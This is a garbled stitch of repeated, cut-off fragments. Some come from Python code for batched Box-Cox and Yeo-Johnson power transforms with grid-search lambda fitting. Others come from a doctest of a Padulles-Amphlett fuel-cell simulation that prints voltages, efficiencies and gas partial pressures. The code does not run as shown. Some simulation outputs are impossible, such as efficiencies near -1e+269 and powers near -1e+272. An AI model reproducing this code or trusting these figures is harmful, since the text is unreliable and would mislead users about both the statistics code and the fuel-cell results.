ret =", "KS-stat, # would might better to used shapiro-wilk or 'normaltest' but we'd need", "tranform, batched in the first dimension.\"\"\" y_in = y.astype(xp.float64) lam1 = xp.broadcast_to(lam, (y_in.shape[0],", "xp.special.erfc(-t / (sigma[:, None] * xp.sqrt(2.0))) # pylint: disable=no-member y[y > 1.0] =", "def __init__( self, ): \"\"\"Init lambda storage.\"\"\" self.lam1 = None self.lam2 = None", "y_in = y.astype(xp.float64) lam1 = xp.broadcast_to(lam, (y_in.shape[0], 1)).astype(xp.float64) ret = xp.empty(y.shape) zero_mask =", "- 2.0) * y_in[~pos_mask] + 1.0) ** (1.0 / (2.0 - lam1[~pos_mask]))) +", "lam1[~zero_mask]) - lam2[~zero_mask] return ret def norm_cdf(x, mu, sigma): \"\"\"Normal distribution CDF, batched.\"\"\"", "zero_mask = xp.around(xp.ravel(lam1), 4) == 0.0 two_mask = xp.around(xp.ravel(lam1), 4) == 2.0 pos_mask", "@sync_numerical_libs def inv_boxcox(y, lam1, lam2): \"\"\"Inverse Box-Cox tranform, batched in the first dimension.\"\"\"", "y.astype(xp.float64) lam1 = xp.broadcast_to(lam, (y_in.shape[0], 1)).astype(xp.float64) ret = xp.empty(y.shape) zero_mask = xp.around(xp.ravel(lam1), 4)", "None: lam2 = 1.0 - xp.min(y_in, axis=axis, keepdims=True) ret = xp.empty(y.shape) zero_mask =", "for a Box-Cox transformer.\"\"\" def __init__( self, ): \"\"\"Init lambda storage.\"\"\" self.lam1 =", "xp.broadcast_to(two_mask[:, None], pos_mask.shape) lam1 = xp.broadcast_to(lam1, pos_mask.shape) ret[pos_mask] = (lam1[pos_mask] * y_in[pos_mask] +", "((y_in[pos_mask] + 1.0) ** lam1[pos_mask] - 1.0) / lam1[pos_mask] ret[pos_mask & zero_mask] =", "boxcox(y_in, lam) ys = xp.sort(yp, axis=1) cdf = xp.cumsum(ys, axis=1) / xp.sum(yp, axis=1,", "_, _ = boxcox(y_in, lam) ys = xp.sort(yp, axis=1) cdf = xp.cumsum(ys, axis=1)", "ret[~zero_mask] = ((y_in[~zero_mask] + lam2[~zero_mask]) ** lam1[~zero_mask] - 1.0) / lam1[~zero_mask] return ret,", "power transformation classes.\"\"\" # pylint: disable=unused-variable from ..numerical_libs import sync_numerical_libs, xp # TODO", "* y_in[~zero_mask] + 1.0) ** (1.0 / lam1[~zero_mask]) - lam2[~zero_mask] return ret def", "- 1.0) / lam1[pos_mask] ret[pos_mask & zero_mask] = xp.log(y_in[pos_mask & zero_mask] + 1.0)", "0.1)): \"\"\"Fit lambda of a power transform using grid search, taking the the", "lambdas for the inv transform.\"\"\" ks = fit_lam(y, yj=True) ret, self.lam1 = yeojohnson(y,", "= xp.exp(y_in[zero_mask]) - lam2[zero_mask] ret[~zero_mask] = (lam1[~zero_mask] * y_in[~zero_mask] + 1.0) ** (1.0", "= ((y_in[~zero_mask] + lam2[~zero_mask]) ** lam1[~zero_mask] - 1.0) / lam1[~zero_mask] return ret, lam1,", "ret[~pos_mask] = -(((lam1[~pos_mask] - 2.0) * y_in[~pos_mask] + 1.0) ** (1.0 / (2.0", "** lam1[~zero_mask] - 1.0) / lam1[~zero_mask] return ret, lam1, lam2 @sync_numerical_libs def inv_boxcox(y,", "ret[pos_mask & zero_mask] = xp.log(y_in[pos_mask & zero_mask] + 1.0) ret[~pos_mask] = ((1.0 -", "a = xp.ravel(a) # axis = 0 axis = y.ndim - 1 y_in", "could be better organized... @sync_numerical_libs def yeojohnson(y, lam): \"\"\"Yeo-Johnson tranform, batched in the", "best_ks_lam) class BoxCox: \"\"\"Wrapper class for a Box-Cox transformer.\"\"\" def __init__( self, ):", "self, ): \"\"\"Init lambda storage.\"\"\" self.lam1 = None self.lam2 = None def fit(self,", "transform.\"\"\" ks = fit_lam(y, yj=False) ret, self.lam1, self.lam2 = boxcox(y, ks[1][:, None]) return", "variables in y, store the lambdas for the inv transform.\"\"\" ks = fit_lam(y,", "def inv(self, y): \"\"\"Inverse tranform using the fitted lambda values.\"\"\" return inv_boxcox(y, self.lam1,", "== 2.0 pos_mask = y_in >= 0.0 zero_mask = xp.broadcast_to(zero_mask[:, None], pos_mask.shape) two_mask", "batched version y_in = xp.atleast_2d(y) batch_size = y_in.shape[0] best_ks = xp.full(batch_size, xp.inf) best_ks_lam", "ks = fit_lam(y, yj=True) ret, self.lam1 = yeojohnson(y, ks[1][:, None]) return ret def", "/ lam1[~zero_mask] return ret, lam1, lam2 @sync_numerical_libs def inv_boxcox(y, lam1, lam2): \"\"\"Inverse Box-Cox", "if lam2 is None: lam2 = 1.0 - xp.min(y_in, axis=axis, keepdims=True) ret =", "power transform using grid search, taking the the most normally distributed result.\"\"\" #", "= fit_lam(y, yj=True) ret, self.lam1 = yeojohnson(y, ks[1][:, None]) return ret def inv(self,", "organized... @sync_numerical_libs def yeojohnson(y, lam): \"\"\"Yeo-Johnson tranform, batched in the first dimension.\"\"\" y_in", "0.0 ret[zero_mask] = xp.log(y_in[zero_mask] + lam2[zero_mask]) ret[~zero_mask] = ((y_in[~zero_mask] + lam2[~zero_mask]) ** lam1[~zero_mask]", "inv_boxcox(y, self.lam1, self.lam2) class YeoJohnson: \"\"\"Wrapper class for a Yeo-Johnson transformer.\"\"\" def __init__(", "\"\"\"Box-Cox tranform, batched in the first dimension.\"\"\" # TODO add axis param #", "yj=False, lam_range=(-2, 2, 0.1)): \"\"\"Fit lambda of a power transform using grid search,", "YeoJohnson: \"\"\"Wrapper class for a Yeo-Johnson transformer.\"\"\" def __init__( self, ): \"\"\"Init lambda", "sync_numerical_libs, xp # TODO this could be better organized... @sync_numerical_libs def yeojohnson(y, lam):", "xp.broadcast_to(lam1, pos_mask.shape) ret[pos_mask] = (lam1[pos_mask] * y_in[pos_mask] + 1.0) ** (1.0 / lam1[pos_mask])", "lam return (best_ks, best_ks_lam) class BoxCox: \"\"\"Wrapper class for a Box-Cox transformer.\"\"\" def", "lambda storage.\"\"\" self.lam1 = None self.lam2 = None def fit(self, y): \"\"\"Fit the", "first dimension.\"\"\" y_in = y.astype(xp.float64) ret = xp.empty(y.shape) zero_mask = xp.around(xp.ravel(lam1), 4) ==", "xp.mean(yp, axis=1), xp.var(yp, axis=1))), axis=1) ks_mask = ks < best_ks best_ks[ks_mask] = ks[ks_mask]", "\"\"\"Init lambda storage.\"\"\" self.lam1 = None self.lam2 = None def fit(self, y): \"\"\"Fit", "in y, store the lambdas for the inv transform.\"\"\" ks = fit_lam(y, yj=True)", "zero_mask] + 1.0) ret[~pos_mask] = ((1.0 - y_in[~pos_mask]) ** (2.0 - lam1[~pos_mask]) -", "= xp.empty(y.shape) zero_mask = xp.around(xp.ravel(lam1), 4) == 0.0 ret[zero_mask] = xp.log(y_in[zero_mask] + lam2[zero_mask])", "\"\"\"Inverse Yeo-Johnson tranform, batched in the first dimension.\"\"\" y_in = y.astype(xp.float64) lam1 =", "xp.exp(y_in[pos_mask & zero_mask]) - 1.0 ret[~pos_mask] = -(((lam1[~pos_mask] - 2.0) * y_in[~pos_mask] +", "this just minimizes the KS-stat, # would might better to used shapiro-wilk or", "- mu[:, None] y = 0.5 * xp.special.erfc(-t / (sigma[:, None] * xp.sqrt(2.0)))", "disable=no-member y[y > 1.0] = 1.0 return y @sync_numerical_libs def fit_lam(y, yj=False, lam_range=(-2,", "== 0.0 ret[zero_mask] = xp.log(y_in[zero_mask] + lam2[zero_mask]) ret[~zero_mask] = ((y_in[~zero_mask] + lam2[~zero_mask]) **", "= xp.broadcast_to(two_mask[:, None], pos_mask.shape) lam1 = xp.broadcast_to(lam1, pos_mask.shape) ret[pos_mask] = (lam1[pos_mask] * y_in[pos_mask]", "< best_ks best_ks[ks_mask] = ks[ks_mask] best_ks_lam[ks_mask] = lam return (best_ks, best_ks_lam) class BoxCox:", "(lam1[pos_mask] * y_in[pos_mask] + 1.0) ** (1.0 / lam1[pos_mask]) - 1.0 ret[pos_mask &", "y.astype(xp.float64) ret = xp.empty(y.shape) zero_mask = xp.around(xp.ravel(lam1), 4) == 0.0 ret[zero_mask] = xp.exp(y_in[zero_mask])", "t = x - mu[:, None] y = 0.5 * xp.special.erfc(-t / (sigma[:,", "ret, self.lam1, self.lam2 = boxcox(y, ks[1][:, None]) return ret def inv(self, y): \"\"\"Inverse", "\"\"\"Fit lambda of a power transform using grid search, taking the the most", "fit_lam(y, yj=False, lam_range=(-2, 2, 0.1)): \"\"\"Fit lambda of a power transform using grid", "ret @sync_numerical_libs def boxcox(y, lam, lam2=None): \"\"\"Box-Cox tranform, batched in the first dimension.\"\"\"", "1.0) ** (1.0 / lam1[pos_mask]) - 1.0 ret[pos_mask & zero_mask] = xp.exp(y_in[pos_mask &", "- xp.min(y_in, axis=axis, keepdims=True) ret = xp.empty(y.shape) zero_mask = xp.around(xp.ravel(lam1), 4) == 0.0", "yj: yp, _ = yeojohnson(y, lam) else: yp, _, _ = boxcox(y_in, lam)", "a Yeo-Johnson transformer.\"\"\" def __init__( self, ): \"\"\"Init lambda storage.\"\"\" self.lam1 = None", "sigma): \"\"\"Normal distribution CDF, batched.\"\"\" t = x - mu[:, None] y =", "cdf = xp.cumsum(ys, axis=1) / xp.sum(yp, axis=1, keepdims=True) ks = xp.max(xp.abs(cdf - norm_cdf(ys,", "= lam return (best_ks, best_ks_lam) class BoxCox: \"\"\"Wrapper class for a Box-Cox transformer.\"\"\"", "keepdims=True) ret = xp.empty(y.shape) zero_mask = xp.around(xp.ravel(lam1), 4) == 0.0 ret[zero_mask] = xp.log(y_in[zero_mask]", "inv transform.\"\"\" ks = fit_lam(y, yj=False) ret, self.lam1, self.lam2 = boxcox(y, ks[1][:, None])", "boxcox(y, lam, lam2=None): \"\"\"Box-Cox tranform, batched in the first dimension.\"\"\" # TODO add", "= ks[ks_mask] best_ks_lam[ks_mask] = lam return (best_ks, best_ks_lam) class BoxCox: \"\"\"Wrapper class for", "- lam2[~zero_mask] return ret def norm_cdf(x, mu, sigma): \"\"\"Normal distribution CDF, batched.\"\"\" t", "** lam1[pos_mask] - 1.0) / lam1[pos_mask] ret[pos_mask & zero_mask] = xp.log(y_in[pos_mask & zero_mask]", "1.0 return y @sync_numerical_libs def fit_lam(y, yj=False, lam_range=(-2, 2, 0.1)): \"\"\"Fit lambda of", "yeojohnson(y, lam) else: yp, _, _ = boxcox(y_in, lam) ys = xp.sort(yp, axis=1)", "Yeo-Johnson transformer.\"\"\" def __init__( self, ): \"\"\"Init lambda storage.\"\"\" self.lam1 = None def", "+ 1.0 return ret @sync_numerical_libs def boxcox(y, lam, lam2=None): \"\"\"Box-Cox tranform, batched in", "lam2 @sync_numerical_libs def inv_boxcox(y, lam1, lam2): \"\"\"Inverse Box-Cox tranform, batched in the first", "BoxCox: \"\"\"Wrapper class for a Box-Cox transformer.\"\"\" def __init__( self, ): \"\"\"Init lambda", "= None def fit(self, y): \"\"\"Fit the batched 1d variables in y, store", "class YeoJohnson: \"\"\"Wrapper class for a Yeo-Johnson transformer.\"\"\" def __init__( self, ): \"\"\"Init", "# TODO add axis param # if axis is None: # a =", ">= 0.0 zero_mask = xp.broadcast_to(zero_mask[:, None], pos_mask.shape) two_mask = xp.broadcast_to(two_mask[:, None], pos_mask.shape) lam1", "\"\"\"Wrapper class for a Box-Cox transformer.\"\"\" def __init__( self, ): \"\"\"Init lambda storage.\"\"\"", "batch_size = y_in.shape[0] best_ks = xp.full(batch_size, xp.inf) best_ks_lam = xp.empty(batch_size) for lam in", "ret[(~pos_mask) & two_mask] = -xp.exp(-y_in[(~pos_mask) & two_mask]) + 1.0 return ret @sync_numerical_libs def", "two_mask] = -xp.exp(-y_in[(~pos_mask) & two_mask]) + 1.0 return ret @sync_numerical_libs def boxcox(y, lam,", "for the inv transform.\"\"\" ks = fit_lam(y, yj=True) ret, self.lam1 = yeojohnson(y, ks[1][:,", "just minimizes the KS-stat, # would might better to used shapiro-wilk or 'normaltest'", "lam1[pos_mask] - 1.0) / lam1[pos_mask] ret[pos_mask & zero_mask] = xp.log(y_in[pos_mask & zero_mask] +", "batched in the first dimension.\"\"\" y_in = y.astype(xp.float64) ret = xp.empty(y.shape) zero_mask =", "pos_mask.shape) ret[pos_mask] = ((y_in[pos_mask] + 1.0) ** lam1[pos_mask] - 1.0) / lam1[pos_mask] ret[pos_mask", "1.0 ret[pos_mask & zero_mask] = xp.exp(y_in[pos_mask & zero_mask]) - 1.0 ret[~pos_mask] = -(((lam1[~pos_mask]", "@sync_numerical_libs def boxcox(y, lam, lam2=None): \"\"\"Box-Cox tranform, batched in the first dimension.\"\"\" #", "lam1[pos_mask] ret[pos_mask & zero_mask] = xp.log(y_in[pos_mask & zero_mask] + 1.0) ret[~pos_mask] = ((1.0", "xp.sort(yp, axis=1) cdf = xp.cumsum(ys, axis=1) / xp.sum(yp, axis=1, keepdims=True) ks = xp.max(xp.abs(cdf", "xp.ravel(a) # axis = 0 axis = y.ndim - 1 y_in = y.astype(xp.float64)", "/ xp.sum(yp, axis=1, keepdims=True) ks = xp.max(xp.abs(cdf - norm_cdf(ys, xp.mean(yp, axis=1), xp.var(yp, axis=1))),", "pylint: disable=no-member y[y > 1.0] = 1.0 return y @sync_numerical_libs def fit_lam(y, yj=False,", "transformer.\"\"\" def __init__( self, ): \"\"\"Init lambda storage.\"\"\" self.lam1 = None self.lam2 =", "axis=1) / xp.sum(yp, axis=1, keepdims=True) ks = xp.max(xp.abs(cdf - norm_cdf(ys, xp.mean(yp, axis=1), xp.var(yp,", "CDF, batched.\"\"\" t = x - mu[:, None] y = 0.5 * xp.special.erfc(-t", "self.lam2 = boxcox(y, ks[1][:, None]) return ret def inv(self, y): \"\"\"Inverse tranform using", "lam1[~zero_mask] return ret, lam1, lam2 @sync_numerical_libs def inv_boxcox(y, lam1, lam2): \"\"\"Inverse Box-Cox tranform,", "None] @sync_numerical_libs def inv_yeojohnson(y, lam): \"\"\"Inverse Yeo-Johnson tranform, batched in the first dimension.\"\"\"" ]
[ "1 def DZ_main(): filename = sys.argv[1] df = pd.read_csv(filename) if DZstats == 1:", "define lower limit for probability density plots (PDPs) and kernel density estimates (KDEs)", "intersample_results = intersample(df, xmin, xmax, xint) print(intersample_results) if PlotDistributions == 1: fig, axs", "sys.argv[1] df = pd.read_csv(filename) if DZstats == 1: intersample_results = intersample(df, xmin, xmax,", "xmin = 1 # define lower limit for probability density plots (PDPs) and", "1 # discretization interval for PDPs and KDEs only #DZtools options DZstats =", "= 1 # discretization interval for PDPs and KDEs only #DZtools options DZstats", "xint) print(intersample_results) if PlotDistributions == 1: fig, axs = makeplots(df, xmin, xmax, xint)", "#upper limit for PDPs and KDEs and all plots xint = 1 #", "filename = sys.argv[1] df = pd.read_csv(filename) if DZstats == 1: intersample_results = intersample(df,", "pd.read_csv(filename) if DZstats == 1: intersample_results = intersample(df, xmin, xmax, xint) print(intersample_results) if", "= 1 DZmds = 0 PlotDistributions = 1 def DZ_main(): filename = sys.argv[1]", "sys #import argparse import pandas as pd import matplotlib.pyplot as plt from dztools.stats.intersample", "(PDPs) and kernel density estimates (KDEs) and all plots xmax = 4000 #upper", "(KDEs) and all plots xmax = 4000 #upper limit for PDPs and KDEs", "# define lower limit for probability density plots (PDPs) and kernel density estimates", "matplotlib.pyplot as plt from dztools.stats.intersample import intersample from dztools.utils.makeplots import makeplots xmin =", "DZstats == 1: intersample_results = intersample(df, xmin, xmax, xint) print(intersample_results) if PlotDistributions ==", "density estimates (KDEs) and all plots xmax = 4000 #upper limit for PDPs", "dztools.utils.makeplots import makeplots xmin = 1 # define lower limit for probability density", "from dztools.utils.makeplots import makeplots xmin = 1 # define lower limit for probability", "as pd import matplotlib.pyplot as plt from dztools.stats.intersample import intersample from dztools.utils.makeplots import", "and all plots xmax = 4000 #upper limit for PDPs and KDEs and", "PlotDistributions == 1: fig, axs = makeplots(df, xmin, xmax, xint) plt.show() if __name__", "lower limit for probability density plots (PDPs) and kernel density estimates (KDEs) and", "== 1: fig, axs = makeplots(df, xmin, xmax, xint) plt.show() if __name__ ==", "PlotDistributions = 1 def DZ_main(): filename = sys.argv[1] df = pd.read_csv(filename) if DZstats", "density plots (PDPs) and kernel density estimates (KDEs) and all plots xmax =", "= 4000 #upper limit for PDPs and KDEs and all plots xint =", "import makeplots xmin = 1 # define lower limit for probability density plots", "if PlotDistributions == 1: fig, axs = makeplots(df, xmin, xmax, xint) plt.show() if", "print(intersample_results) if PlotDistributions == 1: fig, axs = makeplots(df, xmin, xmax, xint) plt.show()", "DZstats = 1 DZmds = 0 PlotDistributions = 1 def DZ_main(): filename =", "dztools.stats.intersample import intersample from dztools.utils.makeplots import makeplots xmin = 1 # define lower", "= pd.read_csv(filename) if DZstats == 1: intersample_results = intersample(df, xmin, xmax, xint) print(intersample_results)", "options DZstats = 1 DZmds = 0 PlotDistributions = 1 def DZ_main(): filename", "= 0 PlotDistributions = 1 def DZ_main(): filename = sys.argv[1] df = pd.read_csv(filename)", "and KDEs only #DZtools options DZstats = 1 DZmds = 0 PlotDistributions =", "xmax = 4000 #upper limit for PDPs and KDEs and all plots xint", "limit for PDPs and KDEs and all plots xint = 1 # discretization", "argparse import pandas as pd import matplotlib.pyplot as plt from dztools.stats.intersample import intersample", "== 1: intersample_results = intersample(df, xmin, xmax, xint) print(intersample_results) if PlotDistributions == 1:", "only #DZtools options DZstats = 1 DZmds = 0 PlotDistributions = 1 def", "and all plots xint = 1 # discretization interval for PDPs and KDEs", "limit for probability density plots (PDPs) and kernel density estimates (KDEs) and all", "for PDPs and KDEs only #DZtools options DZstats = 1 DZmds = 0", "intersample(df, xmin, xmax, xint) print(intersample_results) if PlotDistributions == 1: fig, axs = makeplots(df,", "= sys.argv[1] df = pd.read_csv(filename) if DZstats == 1: intersample_results = intersample(df, xmin,", "df = pd.read_csv(filename) if DZstats == 1: intersample_results = intersample(df, xmin, xmax, xint)", "import sys #import argparse import pandas as pd import matplotlib.pyplot as plt from", "pandas as pd import matplotlib.pyplot as plt from dztools.stats.intersample import intersample from dztools.utils.makeplots", "probability density plots (PDPs) and kernel density estimates (KDEs) and all plots xmax", "DZmds = 0 PlotDistributions = 1 def DZ_main(): filename = sys.argv[1] df =", "xmax, xint) print(intersample_results) if PlotDistributions == 1: fig, axs = makeplots(df, xmin, xmax,", "1 # define lower limit for probability density plots (PDPs) and kernel density", "1 DZmds = 0 PlotDistributions = 1 def DZ_main(): filename = sys.argv[1] df", "plt from dztools.stats.intersample import intersample from dztools.utils.makeplots import makeplots xmin = 1 #", "plots xint = 1 # discretization interval for PDPs and KDEs only #DZtools", "xint = 1 # discretization interval for PDPs and KDEs only #DZtools options", "KDEs and all plots xint = 1 # discretization interval for PDPs and", "def DZ_main(): filename = sys.argv[1] df = pd.read_csv(filename) if DZstats == 1: intersample_results", "intersample from dztools.utils.makeplots import makeplots xmin = 1 # define lower limit for", "makeplots xmin = 1 # define lower limit for probability density plots (PDPs)", "0 PlotDistributions = 1 def DZ_main(): filename = sys.argv[1] df = pd.read_csv(filename) if", "estimates (KDEs) and all plots xmax = 4000 #upper limit for PDPs and", "1: fig, axs = makeplots(df, xmin, xmax, xint) plt.show() if __name__ == '__main__':", "DZ_main(): filename = sys.argv[1] df = pd.read_csv(filename) if DZstats == 1: intersample_results =", "plots (PDPs) and kernel density estimates (KDEs) and all plots xmax = 4000", "KDEs only #DZtools options DZstats = 1 DZmds = 0 PlotDistributions = 1", "plots xmax = 4000 #upper limit for PDPs and KDEs and all plots", "= 1 def DZ_main(): filename = sys.argv[1] df = pd.read_csv(filename) if DZstats ==", "discretization interval for PDPs and KDEs only #DZtools options DZstats = 1 DZmds", "all plots xmax = 4000 #upper limit for PDPs and KDEs and all", "pd import matplotlib.pyplot as plt from dztools.stats.intersample import intersample from dztools.utils.makeplots import makeplots", "= 1 # define lower limit for probability density plots (PDPs) and kernel", "all plots xint = 1 # discretization interval for PDPs and KDEs only", "import intersample from dztools.utils.makeplots import makeplots xmin = 1 # define lower limit", "= intersample(df, xmin, xmax, xint) print(intersample_results) if PlotDistributions == 1: fig, axs =", "from dztools.stats.intersample import intersample from dztools.utils.makeplots import makeplots xmin = 1 # define", "kernel density estimates (KDEs) and all plots xmax = 4000 #upper limit for", "1: intersample_results = intersample(df, xmin, xmax, xint) print(intersample_results) if PlotDistributions == 1: fig,", "xmin, xmax, xint) print(intersample_results) if PlotDistributions == 1: fig, axs = makeplots(df, xmin,", "fig, axs = makeplots(df, xmin, xmax, xint) plt.show() if __name__ == '__main__': DZ_main()", "4000 #upper limit for PDPs and KDEs and all plots xint = 1", "PDPs and KDEs only #DZtools options DZstats = 1 DZmds = 0 PlotDistributions", "and KDEs and all plots xint = 1 # discretization interval for PDPs", "PDPs and KDEs and all plots xint = 1 # discretization interval for", "for PDPs and KDEs and all plots xint = 1 # discretization interval", "import matplotlib.pyplot as plt from dztools.stats.intersample import intersample from dztools.utils.makeplots import makeplots xmin", "import pandas as pd import matplotlib.pyplot as plt from dztools.stats.intersample import intersample from", "and kernel density estimates (KDEs) and all plots xmax = 4000 #upper limit", "as plt from dztools.stats.intersample import intersample from dztools.utils.makeplots import makeplots xmin = 1", "#DZtools options DZstats = 1 DZmds = 0 PlotDistributions = 1 def DZ_main():", "# discretization interval for PDPs and KDEs only #DZtools options DZstats = 1", "#import argparse import pandas as pd import matplotlib.pyplot as plt from dztools.stats.intersample import", "interval for PDPs and KDEs only #DZtools options DZstats = 1 DZmds =", "if DZstats == 1: intersample_results = intersample(df, xmin, xmax, xint) print(intersample_results) if PlotDistributions", "for probability density plots (PDPs) and kernel density estimates (KDEs) and all plots" ]
[ "Activation : 0.4228725100457559 V Eta Concentration : 0.0007181421727400468 V Eta Ohmic : 0.006390481776561363", "0.2 E : 6.068413961701556 V Eta Activation : 0.23146009851376736 V Eta Concentration :", ": 0.41280968341523216 W ########### I : 0.4 E : 6.068410886366294 V Eta Activation", "4.0 E : 6.144553093215826 V Eta Activation : 0.9106431331307118 V Eta Concentration :", ": 10.861455594255196 W FC Voltage : 4.022761331205627 V Loss : 0.40912283407888206 V PH2", ": 0.3678117158535559 V PH2 : 0.19697403699020044 atm PH2O : 0.24244105102809288 atm PO2 :", "Efficiency : -2.9725482904327946e+269 FC Power : -2.3185876665375803e+269 W FC Voltage : -2.3185876665375803e+270 V", "PH2O : 0.2420778855261935 atm PO2 : 0.19034871930135727 atm Power-Thermal : 8.033558485745605 W ###########", ": 6.068375501600038 V Eta Activation : 0.4038089891176398 V Eta Concentration : 0.0005353086845364485 V", "PH2 : 0.19707238966150117 atm PH2O : 0.24256210619539273 atm PO2 : 0.1905708387709098 atm Power-Thermal", ": 6.731161282259518 W FC Voltage : 4.206975801412199 V Loss : 0.37228332551300575 V PH2", "Eta Ohmic : 1.8785852500552963e+271 V FC Efficiency : -1.2042213141380103e+271 FC Power : -3.757170500110593e+272", "Power-Thermal : 5.249386015321152 W ########### I : 2.6 E : 6.068377040773017 V Eta", "V Loss : 0.43396509140262446 V PH2 : 0.19665087821306954 atm PH2O : 0.2420432983355364 atm", ": -5.981929710129684e+270 FC Power : -9.331810347802308e+271 W FC Voltage : -4.665905173901154e+271 V Loss", "atm PO2 : 0.19034871930135727 atm Power-Thermal : 8.033558485745605 W ########### I : 3.7", "Eta Ohmic : 0.0060314264601405215 V FC Efficiency : 0.5050511549266622 FC Power : 13.393956628655083", "0.19690378508212852 atm PH2O : 0.2423545830514502 atm PO2 : 0.19047564471253012 atm Power-Thermal : 4.041762851824391", "FC Voltage : 4.0097174496577335 V Loss : 0.41173130254104057 V PH2 : 0.1967913820292134 atm", "Eta Ohmic : 0.002113348284589288 V FC Efficiency : 0.5520748042471996 FC Power : 5.1674201677537885", "atm PO2 : 0.1906263686382979 atm Power-Thermal : 0.1010420899676448 W ########### I : 0.2", "PH2O : 0.24247563821874998 atm PO2 : 0.19053117457991825 atm Power-Thermal : 2.432697510654893 W ###########", "0.005852080755831333 V FC Efficiency : 0.5064475653403494 FC Power : 13.035960331860592 W FC Voltage", ": 0.24206059193086493 atm PO2 : 0.19034078646315894 atm Power-Thermal : 8.29401625290499 W ########### I", "Ohmic : 0.0024671853140681515 V FC Efficiency : 0.5452780290261753 FC Power : 5.954436076965834 W", ": 5.1674201677537885 W FC Voltage : 4.306183473128157 V Loss : 0.3524430218673324 V PH2", "I : 2.5 E : 6.068378579881878 V Eta Activation : 0.39870996749954657 V Eta", "Ohmic : 0.003531492225469087 V FC Efficiency : 0.5293741761651032 FC Power : 8.25823714817561 W", "FC Voltage : 3.997095288345469 V Loss : 0.4142554269432475 V PH2 : 0.196777331647599 atm", ": 3.9393990084279658 V Loss : 0.4257931434330969 V PH2 : 0.19670707973952706 atm PH2O :", "########### I : 2.6 E : 6.068377040773017 V Eta Activation : 0.40130847825734167 V", ": 3.8985331094508706 V Loss : 0.43396509140262446 V PH2 : 0.19665087821306954 atm PH2O :", "FC Power : 5.954436076965834 W FC Voltage : 4.253168626404167 V Loss : 0.36304537588899266", ": 7.809186891953766e-05 V Eta Ohmic : 0.0007026162388380664 V FC Efficiency : 0.5997124668722417 FC", "0.1905867044473064 >>> Padulles_Amphlett_Data[\"PH2\"][5] 0.19710049042472996 >>> Padulles_Amphlett_Data[\"PH2O\"][5] 0.2425966933860498 >>> Padulles_Amphlett_Data[\"Ph\"][5] 0.9650580567185031 >>> Padulles_Amphlett_Data[\"VE\"][5] 4.553525621759973", ": 0.3960054536369255 V Eta Concentration : 0.00047486339861378836 V Eta Ohmic : 0.004243378155424144 V", "Ohmic : 0.004778536276705824 V FC Efficiency : 0.5157386322058496 FC Power : 10.861455594255196 W", ": 0.19663682783145514 atm PH2O : 0.24202600474020786 atm PO2 : 0.19032492078676233 atm Power-Thermal :", "atm PH2O : 0.24206059193086493 atm PO2 : 0.19034078646315894 atm Power-Thermal : 8.29401625290499 W", "atm PO2 : 0.1904439133597369 atm Power-Thermal : 5.004572056867657 W ########### I : 2.5", "PO2 : 0.1904597790361335 atm Power-Thermal : 4.519750111503576 W ########### I : 2.3 E", "Eta Ohmic : 0.0028214871486926026 V FC Efficiency : 0.5393558719759229 FC Power : 6.731161282259518", ">>> Test_Vector={\"A\":50.6,\"l\":0.0178,\"lambda\":23,\"JMax\":1.5,\"T\":343,\"N0\":5,\"KO2\":0.0000211,\"KH2\":0.0000422,\"KH2O\":0.000007716,\"tH2\":3.37,\"tO2\":6.74,\"t1\":2,\"t2\":2,\"tH2O\":18.418,\"rho\":1.168,\"qMethanol\":0.0002,\"CV\":2,\"i-start\":0.1,\"i-stop\":4,\"i-step\":0.1,\"Name\":\"Test\"} >>> Padulles_Amphlett_Data=Dynamic_Analysis(InputMethod=Test_Vector, TestMode=True) ########### Padulles-Amphlett-Model Simulation ########### Analyzing . . .", "0.39318591119501267 V Eta Concentration : 0.00045476978327314626 V Eta Ohmic : 0.004065229504538212 V FC", ": 1.3645077216348895 W ########### I : 0.9 E : 6.068403196908046 V Eta Activation", "PO2 : 0.1903883834923488 atm Power-Thermal : 6.748686546268298 W ########### I : 3.2 E", "V PH2 : 0.19686163393728537 atm PH2O : 0.24230270226546458 atm PO2 : 0.19045184619793523 atm", ": 4.60290798706484 V Loss : 0.2931002723075654 V PH2 : 0.19711454080634436 atm PH2O :", "atm PO2 : 0.19060257012370302 atm Power-Thermal : 0.588897103358606 W ########### I : 0.5", ": 10.494272955870581 W FC Voltage : 4.036258829180992 V Loss : 0.40642364231840483 V PH2", ": 2.212579832246212 W ########### I : 1.3 E : 6.068397044188998 V Eta Activation", "0.5140663396997094 FC Power : 11.227208859041653 W FC Voltage : 4.0097174496577335 V Loss :", "0.5997124668722417 FC Power : 1.8711028966413943 W FC Voltage : 4.677757241603485 V Loss :", "0.2421297663121791 atm PO2 : 0.19037251781595219 atm Power-Thermal : 7.259039668139408 W ########### I :", "V Loss : 0.4299811339950573 V PH2 : 0.1966789789762983 atm PH2O : 0.2420778855261935 atm", "Simulation ########### Analyzing . . . I : 0.1 E : 6.14455344314445 V", "Padulles_Amphlett_Data[\"V\"][5] 4.541569905469162 >>> Padulles_Amphlett_Data[\"EFF\"][5] 0.5822525519832258 >>> Padulles_Amphlett_Data[\"PO2\"][5] 0.1905867044473064 >>> Padulles_Amphlett_Data[\"PH2\"][5] 0.19710049042472996 >>> Padulles_Amphlett_Data[\"PH2O\"][5]", "0.19031698794856405 atm Power-Thermal : 3.757170500110593e+272 W ########### Report is generating ... Warning :", "Voltage : 4.095568131134739 V Loss : 0.39456301313781456 V PH2 : 0.19687568431889974 atm PH2O", "0.19053910741811658 atm Power-Thermal : 2.212579832246212 W ########### I : 1.3 E : 6.068397044188998", ": 0.19688973470051413 atm PH2O : 0.24233728945612165 atm PO2 : 0.19046771187433184 atm Power-Thermal :", "V Eta Concentration : 0.0006162888970501038 V Eta Ohmic : 0.0054937518419525275 V FC Efficiency", "3.8 E : 6.068358566463993 V Eta Activation : 0.4264559863331208 V Eta Concentration :", "Report is generating ... Done! >>> Padulles_Amphlett_Data[\"Status\"] True >>> Padulles_Amphlett_Data[\"P\"][5] 2.724941943281497 >>> Padulles_Amphlett_Data[\"I\"][5]", "PH2 : 0.19714264156957312 atm PH2O : 0.24264857417203542 atm PO2 : 0.1906105029619013 atm Power-Thermal", "atm Power-Thermal : 5.7435444057448075 W ########### I : 2.8 E : 6.068373962362936 V", ": 0.24202600474020786 atm PO2 : 0.19032492078676233 atm Power-Thermal : 8.818208962422144 W ########### Report", "V Eta Concentration : 0.00023552453535116493 V Eta Ohmic : 0.002113348284589288 V FC Efficiency", "V Eta Concentration : 0.0005151327744999589 V Eta Ohmic : 0.004600031286563196 V FC Efficiency", "Power-Thermal : 0.9650580567185031 W ########### I : 0.7 E : 6.068406272883388 V Eta", "0.1904280476833403 atm 